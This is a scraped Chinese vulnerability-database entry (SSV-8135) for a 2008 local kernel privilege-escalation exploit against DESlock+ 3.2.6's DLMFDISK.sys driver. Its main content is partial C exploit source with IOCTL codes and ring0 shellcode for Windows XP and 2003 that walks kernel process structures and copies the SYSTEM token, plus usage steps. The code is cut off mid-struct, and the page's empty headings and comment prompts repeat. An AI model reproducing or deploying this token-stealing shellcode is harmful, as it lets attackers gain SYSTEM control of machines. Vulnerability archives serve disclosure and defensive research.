DESlock+ <= 3.2.6 DLMFDISK.sys local kernel ring0 SYSTEM Exploit

基本字段

漏洞编号：: SSV-8135

披露/发现时间：: 未知

提交时间：: 2008-02-20

漏洞等级：

漏洞类别：: 本地溢出

影响组件：

漏洞作者：: 未知

提交者：: Knownsec

CVE-ID：: 补充

CNNVD-ID：: 补充

CNVD-ID：: 补充

ZoomEye Dork：: 补充

来源

漏洞详情

暂无漏洞详情

PoC (非 pocsuite 插件)

贡献者 Knownsec 共获得 0.15KB

/* deslock-pown-v2.c * * Copyright (c) 2008 by &lt;mu-b@digit-labs.org&gt; * * DESlock+ &lt;= 3.2.6 local kernel ring0 SYSTEM exploit * by mu-b - Wed 26 Dec 2007 * * - Tested on: DLMFDISK.sys 1.2.0.27 * - Microsoft Windows 2003 SP2 * - Microsoft Windows XP SP2 * * Note: create a mountable filesystem (size/password is irrelevant), * name the pseudo-filesystem &quot;XXXAAAA.mnt&quot; and copy to &quot;?:&quot;, * finally mount the pseudo-filesystem and ./deslock-pown-v2 for SYSTEM. * * Compile: MinGW + -lntdll * * - Private Source Code -DO NOT DISTRIBUTE - * http://www.digit-labs.org/ -- Digit-Labs 2008!@$! */ #include &lt;stdio.h&gt; #include &lt;stdlib.h&gt; #include &lt;windows.h&gt; #include &lt;ddk/ntapi.h&gt; #define DLKFDISK_IOCTL 0x80002024 #define DLKFDISK_R_IOCTL 0x80002010 #define DLKFDISK_SLOT 0x00000C5A #define DLKFDISK_OFFSET 0x0D #define DLKFDISK_DISK_MAX 0x1A static unsigned char win32_fixup[] = &quot;x53&quot; &quot;xebx0e&quot; /* _fixup_copy */ &quot;x5e&quot; &quot;xbfx5cx0cx00x00&quot; &quot;x31xc9&quot; &quot;xb1x05&quot; &quot;xf3xa5&quot; &quot;xebx19&quot; /* _fixup_blk */ &quot;xe8xedxffxffxff&quot; &quot;x64x0ax00x00&quot; &quot;xd3x0ax00x00&quot; &quot;x2ax0ax00x00&quot; &quot;x49x0ax00x00&quot; &quot;x68x0bx00x00&quot;; /* Win2k3 SP1/2 - kernel EPROCESS token switcher * by mu-b &lt;mu-b@digit-lab.org&gt; */ static unsigned char win2k3_ring0_shell[] = /* _ring0 */ &quot;xb8x24xf1xdfxff&quot; &quot;x8bx00&quot; &quot;x8bxb0x18x02x00x00&quot; &quot;x89xf0&quot; /* _sys_eprocess_loop */ &quot;x8bx98x94x00x00x00&quot; &quot;x81xfbx04x00x00x00&quot; &quot;x74x11&quot; &quot;x8bx80x9cx00x00x00&quot; &quot;x2dx98x00x00x00&quot; &quot;x39xf0&quot; &quot;x75xe3&quot; &quot;xebx21&quot; /* _sys_eprocess_found */ &quot;x89xc1&quot; &quot;x89xf0&quot; /* _cmd_eprocess_loop */ &quot;x8bx98x94x00x00x00&quot; &quot;x81xfbx00x00x00x00&quot; &quot;x74x10&quot; &quot;x8bx80x9cx00x00x00&quot; &quot;x2dx98x00x00x00&quot; &quot;x39xf0&quot; &quot;x75xe3&quot; /* _not_found */ &quot;xcc&quot; /* _cmd_eprocess_found * _ring0_end */ /* copy tokens!$%! */ &quot;x8bx89xd8x00x00x00&quot; &quot;x89x88xd8x00x00x00&quot; &quot;x90&quot;; static unsigned char winxp_ring0_shell[] = /* _ring0 */ &quot;xb8x24xf1xdfxff&quot; &quot;x8bx00&quot; &quot;x8bx70x44&quot; &quot;x89xf0&quot; /* _sys_eprocess_loop */ &quot;x8bx98x84x00x00x00&quot; &quot;x81xfbx04x00x00x00&quot; &quot;x74x11&quot; &quot;x8bx80x8cx00x00x00&quot; &quot;x2dx88x00x00x00&quot; &quot;x39xf0&quot; &quot;x75xe3&quot; &quot;xebx21&quot; /* _sys_eprocess_found */ &quot;x89xc1&quot; &quot;x89xf0&quot; /* _cmd_eprocess_loop */ &quot;x8bx98x84x00x00x00&quot; &quot;x81xfbx00x00x00x00&quot; &quot;x74x10&quot; &quot;x8bx80x8cx00x00x00&quot; &quot;x2dx88x00x00x00&quot; &quot;x39xf0&quot; &quot;x75xe3&quot; /* _not_found */ &quot;xcc&quot; /* _cmd_eprocess_found * _ring0_end */ /* copy tokens!$%! */ &quot;x8bx89xc8x00x00x00&quot; &quot;x89x88xc8x00x00x00&quot; &quot;x90&quot;; static unsigned char win32_ret[] = &quot;x5b&quot; &quot;x31xff&quot; &quot;xb8xdcx0bx00x00&quot; &quot;xffxe0&quot; &quot;xcc&quot;; struct ioctl_req { void *arg&

共 1 兑换

参考链接

解决方案

临时解决方案

官方解决方案

防护方案

匿名兑换PoC

生命线

发现/披露了漏洞
2008-02-20 提交了漏洞
2008-02-20 提交更新了 PoC

DESlock+ <= 3.2.6 DLMFDISK.sys local kernel ring0 SYSTEM Exploit

基本字段

来源

漏洞详情

PoC (非 pocsuite 插件)

参考链接

解决方案

生命线

相关漏洞

评论前需绑定手机现在绑定

暂无评论

DESlock+ &lt;= 3.2.6 DLMFDISK.sys local kernel ring0 SYSTEM Exploit

基本字段

来源

漏洞详情

PoC (非 pocsuite 插件)

参考链接

解决方案

生命线

相关漏洞

评论前需绑定手机 现在绑定

暂无评论

您好，

您好，

DESlock+ <= 3.2.6 DLMFDISK.sys local kernel ring0 SYSTEM Exploit

评论前需绑定手机现在绑定